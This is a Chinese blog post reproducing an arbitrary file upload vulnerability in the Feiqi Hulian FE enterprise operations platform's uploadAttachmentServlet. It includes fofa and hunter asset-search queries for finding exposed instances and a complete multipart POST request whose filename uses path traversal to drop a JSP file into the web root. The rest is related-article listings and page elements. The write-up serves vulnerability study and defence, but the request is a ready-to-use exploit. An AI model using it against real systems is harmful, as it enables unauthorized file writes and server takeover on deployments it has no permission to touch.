【漏洞复现】飞企互联FE企业运营管理平台 uploadAttachmentServlet 任意文件上传漏洞

已于 2024-03-25 15:15:23 修改
阅读量597 收藏 5
点赞数 7
分类专栏: 漏洞复现 文章标签: web安全
于 2024-03-25 15:14:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40550150/article/details/137015177
版权

免责声明:文章来源互联网收集整理,文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

一、漏洞简介

FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联FE业务协作平台uploadAttachmentServlet 任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。

二、影响版本

  • 飞企互联FE业务协作平台

三、资产测绘

  • hunter:app.name=="飞企互联 FE 6.0+"||app.name=="飞企互联 FE"
  • fofa:app="FE-协作平台"
    在这里插入图片描述

四、漏洞复现

访问如下页面返回200,出现以下页面表示可能存在漏洞
image.png

http://ip/servlet/uploadAttachmentServlet

上传文件

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
 
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain
 
<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"
 
{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

image.png
PS:jsp文件上传后默认是不解析 ,需在文件名后加个
image.png

E_cho234
关注
  • 7
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【0day】互联 FE业务协作平台 某接口任意文件读取漏洞
记录并分享学习安全的知识点..
10-16 398
互联Feiqi Hulian)是一家提供FE(Front End)业务协作平台的公司。FE业务协作平台是针对前端开发团队而设计的工具,旨在提高团队协作效率、优化工作流程,并支持团队成员之间的沟通和协作。互联 FE业务协作平台某接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件
漏洞互联-FE企业运营管理平台-uploadAttachmentServlet-任意文件
知黑而守白
03-07 1593
互联FE企业运营管理平台是一款基于先进技术的云工作台,采用云计算、智能化、大数据、物联网和移动互联网等技术,以支撑企业的数字化转型。互联FE企业运营管理平台 uploadAttachmentServlet 接口存在一个任意文件漏洞,该漏洞使得攻击者可以在受影响的系统上上恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。攻击者可以通过上恶意文件来滥用系统,可能导致灾难性后果。
互联-FE企业运营管理平台uploadAttachmentServlet存在任意文件漏洞
qq_36334672的博客
03-29 264
互联-FE企业运营管理平台 uploadAttachmentServlet存在文件漏洞,攻击者可通过该漏洞在服务器端写入后门文件任意执行代码,获取服务器权限,进而控制整个 web 服务器。
0day-互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件漏洞
weixin_43167326的博客
03-22 1147
互联-FE企业运营管理平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的云工作台。这个平台可以连接人、链接端、联通内外,支持企业B2B、C2B与O2O等核心需求,为不同行业客户的互联网+转型提供支持。其特色在于提供云端工作环境,整合了人工智能、大数据分析和物联网设备管理,为不同行业客户的互联网+转型提供全面支持。通过智能化的决策支持和数据驱动的业务优化,企业可以更灵活、高效地运营业务,实数字化转型的战略目标。
互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件漏洞_servlet uploadattachmentservlet
最新发布
m0_60567881的博客
04-12 347
互联-FE企业运营管理平台 /servlet/uploadAttachmentServlet接口处存在文件漏洞,未经身份验证的攻击者可以利用此漏洞恶意后门文件,获取服务器权限,进而控制整个web服务器。
【精品】智慧协同成就高绩效组织-互联新一代企业管理平台29.9.pptx
06-26
互联新一代企业管理平台,如“智慧协同成就高绩效组织-互联新一代企业管理平台29.9.pptx”所示,通过集成化的信息系统和灵活的组织架构,帮助企业适应全球化、跨界竞争以及5G时代的挑战。 在不断变化的商业环境中,...
企业互联协同管理平台.pptx
10-27
"企业互联协同管理平台" 在这个快速变化的商业环境中,企业面临着许多挑战,例如快速变化的商业模式、跨界的商业环境、 领导一线员工的一级经营体、资源部门的二级经营体、领导外部边界的三级经营体等。如何破解...
智慧企业大数据分析运营平台建设综合解决方案.pptx
04-14
这一综合解决方案旨在构建一个统一的、高效的、适用于各类企业的智慧平台系统,通过整合管理对象、适应区域化管理、输出集成服务以及发挥信息技术的优势,实企业运营的智能化。 在【总体设计】部分,智慧企业建设...
集团企业运营管控平台整体解决方案 集团企业信息化整体解决方案.pptx
04-14
集团企业运营管控平台整体解决方案旨在整合并优化集团企业的信息化管理,以提升运营效率和经济效益。这个平台涵盖了多个关键领域,包括楼宇自动化、系统集成、EAM(资产管理)以及新技术如BIM(建筑信息模型)的应用...
集团企业信息化管理平台综合解决方案.pptx
04-14
总之,集团企业信息化管理平台综合解决方案是一套全面的、智能化的企业管理工具,旨在通过技术创新和信息整合,提升企业运营效率,优化资源配置,降低运营成本,为集团型企业打造代化的管理模式。
FE业务协作平台安装手册
06-17
FE业务协作平台安装手册,详细介绍FE业务协作平台安装过程
FE业务协作平台管理员操作手册
06-17
FE业务协作平台管理员操作手册,详细描述 FE业务协作平台管理员操作说明
漏洞互联-FE企业运营管理平台-common_sort_tree-任意文件
知黑而守白
01-10 286
互联FE企业运营管理平台是一款基于先进技术的云工作台,采用云计算、智能化、大数据、物联网和移动互联网等技术,以支撑企业的数字化转型。互联-FE企业运营管理平台 common_sort_tree.jsp 接口权限设置不当,攻击者可以通过利用此漏洞,上恶意文件到系统中,可能导致未授权访问、敏感信息泄露或系统完整性受损等严重后果。
互联FE业务协作平台ShowImageServlet接口任意文件读取漏洞
xiaokp7的博客
09-13 723
FE 办公协作平台是实应用开发、运行、管理、维护的信息管理平台互联 FE 业务协作平台存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件获取大量敏感信息。
【1day】互联 FE业务协作平台 ShowImageServlet 接口任意文件读取漏洞
记录并分享学习安全的知识点..
08-22 512
互联Feiqi Hulian)是一家提供FE(Front End)业务协作平台的公司。FE业务协作平台是针对前端开发团队而设计的工具,旨在提高团队协作效率、优化工作流程,并支持团队成员之间的沟通和协作。互联 FE业务协作平台 ShowImageServlet 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件
互联企业运营管理平台存在任意文件读取
qq_36334672的博客
01-24 331
FE 办公协作平台是实应用开发、运行、管理、维护的信息管理平台互联 FE 业务协作平台存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件获取大量敏感信息。
【WEB漏洞原理】任意文件漏洞
过期的秋刀鱼
08-29 1844
文件是web应用必备功能之一,如:头像上,附件分享登,如果服务器配置不当或者 没有进行足够的过滤,Web用户就可以上任意文件,包括恶意脚本文件,exe 程序等等,这就造成了任意文件漏洞
[1day]互联某接口存在SQL注入漏洞-未公开漏洞
weixin_43167326的博客
03-13 329
互联系统是一款针对企业通讯需求的系统,提供包括即时通讯、视频会议、文件共享、日程安排等功能。用户可以通过该系统快速高效地与同事沟通交流,实团队协作和信息分享。该系统支持多种设备接入,保障通讯安全和数据隐私,同时提供灵活的定制化配置以满足不同企业的需求。互联系统致力于提升企业内部沟通效率,促进团队协作,推动工作效率和创新能力的提升。
基于springboot开发科技互联电动汽车充电桩管理系统
07-05
基于Spring Boot开发的科技互联电动汽车充电桩管理系统旨在提供一个高效、智能的电动汽车充电桩管理平台。首先,该系统将使用Spring Boot框架来构建后端服务,并利用其优良特性,如便捷的配置、自动化的部署和快速的启动。 该系统将实管理员和用户两个角色的功能。管理员可以管理充电桩的信息,包括添加新的充电桩、删除已有的充电桩、更新充电桩的状态等。管理员还可以查看每个充电桩的充电记录、统计充电桩的使用情况以及设置充电桩的充电价格等。 用户可以通过系统预约、查询和管理充电桩。用户可以根据自己的需求,查询附近可用充电桩的实时信息,例如位置、空闲/占用状态、充电速度等。用户还可以根据自己的出行计划,在系统中预约充电桩,并获取预约成功的确认信息。在充电过程中,用户可以实时查看当前电量、充电时长等信息,并在充电完成后获取详细的充电记录。 为了提高用户体验,该系统还将使用一些前沿技术。例如,用户可以通过微信小程序、APP等方式进行远程控制,如远程启停充电、预约状态的实时推送等。系统还将实快速支付功能,以便用户可以随时随地方便、快捷地完成支付操作。 除了基本功能外,该系统还将具备一定的可拓展性。例如,可以与第三方平台进行对接,实多渠道支付;可以结合大数据分析技术,对充电桩的使用情况、用户偏好等进行统计和分析,提供数据支持以供决策参考。 综上所述,基于Spring Boot开发的科技互联电动汽车充电桩管理系统将提供一个高效、智能的管理平台,为用户提供方便、快捷的充电服务,并为管理员提供充电桩管理和数据分析的功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值